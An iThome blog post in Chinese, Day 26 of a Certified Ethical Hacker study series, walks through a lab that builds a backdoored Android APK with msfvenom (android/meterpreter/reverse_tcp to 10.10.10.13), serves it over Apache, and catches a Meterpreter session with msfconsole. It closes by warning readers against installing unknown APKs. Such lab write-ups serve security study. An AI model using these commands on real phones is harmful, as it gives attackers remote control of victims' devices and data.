iT邦幫忙

2021 iThome 鐵人賽

DAY 26
0
Security

Certificated Ethical Hacker菜雞上路系列 第 26

Day26:今天來聊一下Hacking Mobile Platforms

隨著Mobile技術的進步,移動性已成為Internet使用的一個關鍵特色。

人們的生活方式越來越依賴智能手機和平板電腦。手機使用者能夠存取

電子郵件、Internet和GPS導航,並儲存聯絡人清單、密碼、日曆和登入

密碼等資料。並在手機上進行各種交易(網路購物、銀行業務及證券交易)

Hacker會利用移動裝置的特性向個人發送格式錯誤的APK(應用程式封裝檔)

或URL,以誘使受害者點擊甚至安裝它們,進而授予攻擊者訪問用戶登録數據

的權限,或對其設備進行全部或部分控制。

接下來我們來談一下Hacking Mobile Platforms中的LAB

登入Parrot Security主機,並輸入sudo su切換身份

輸入cd切換目録

https://ithelp.ithome.com.tw/upload/images/20211010/20112182GgYYZntDoF.png

輸入以下指令service postgresql start啟動Postgresql DB

https://ithelp.ithome.com.tw/upload/images/20211010/20112182a8SEucfaDH.png

輸入以下指令建立一個藏有後門的Android APK(網路的APK不要亂裝)/images/emoticon/emoticon50.gif

msfvenom -p android/meterpreter/reverse_tcp --platform android -a dalvik LHOST=10.10.10.13 R > Desktop/Backdoor.apk

https://ithelp.ithome.com.tw/upload/images/20211010/20112182jHnIrZiFQO.png

將產生的Backdoor.apk複製到/root/Desktop/Backdoor.apk /var/www/html/share/目録

cp /root/Desktop/Backdoor.apk /var/www/html/share/ 

輸入指令service apache2 start啟動Apache服務

https://ithelp.ithome.com.tw/upload/images/20211010/20112182tS23i4JA2d.png

輸入指令msfconsole,再執行use exploit/multi/handler

https://ithelp.ithome.com.tw/upload/images/20211010/201121826K6aJEamWX.png

輸入以下指令

set payload android/meterpreter/reverse_tcp

set LHOST 10.10.10.13

show options

https://ithelp.ithome.com.tw/upload/images/20211010/20112182yUNpgyjqkQ.png

輸入以下指令,執行exploit在背景執行

exploit -j -z

用Android手機到http://10.10.10.13/share 去下載Backdoor.apk

https://ithelp.ithome.com.tw/upload/images/20211010/20112182e2MbxY3d6f.png

在手機安裝Backdoor.apk

https://ithelp.ithome.com.tw/upload/images/20211010/20112182Ny3i0O5978.png

我們在meterpreter後台可以看到手機安裝Backdoor.apk有連上來

https://ithelp.ithome.com.tw/upload/images/20211010/20112182kmIk55fpKd.png

輸入指令sessions -i 1,從Meterpreter shell可以看到Android手機的資訊

https://ithelp.ithome.com.tw/upload/images/20211010/20112182SWxT8Lu2Ij.png

輸入ipconfig可以看到手機連上的IP資訊

https://ithelp.ithome.com.tw/upload/images/20211010/20112182sQGILbqpps.png

輸入pwd可以看到手機的儲存設備路徑

https://ithelp.ithome.com.tw/upload/images/20211010/20112182QrVRC1AKmA.png

看完以上LAB以後在網路上來路不明的APK請勿下載/images/emoticon/emoticon15.gif


上一篇
Day25:今天來聊一下Hacking Wireless Networks
下一篇
Day27:今天我們來聊一下IoT and OT Hacking
系列文
Certificated Ethical Hacker菜雞上路30

尚未有邦友留言

立即登入留言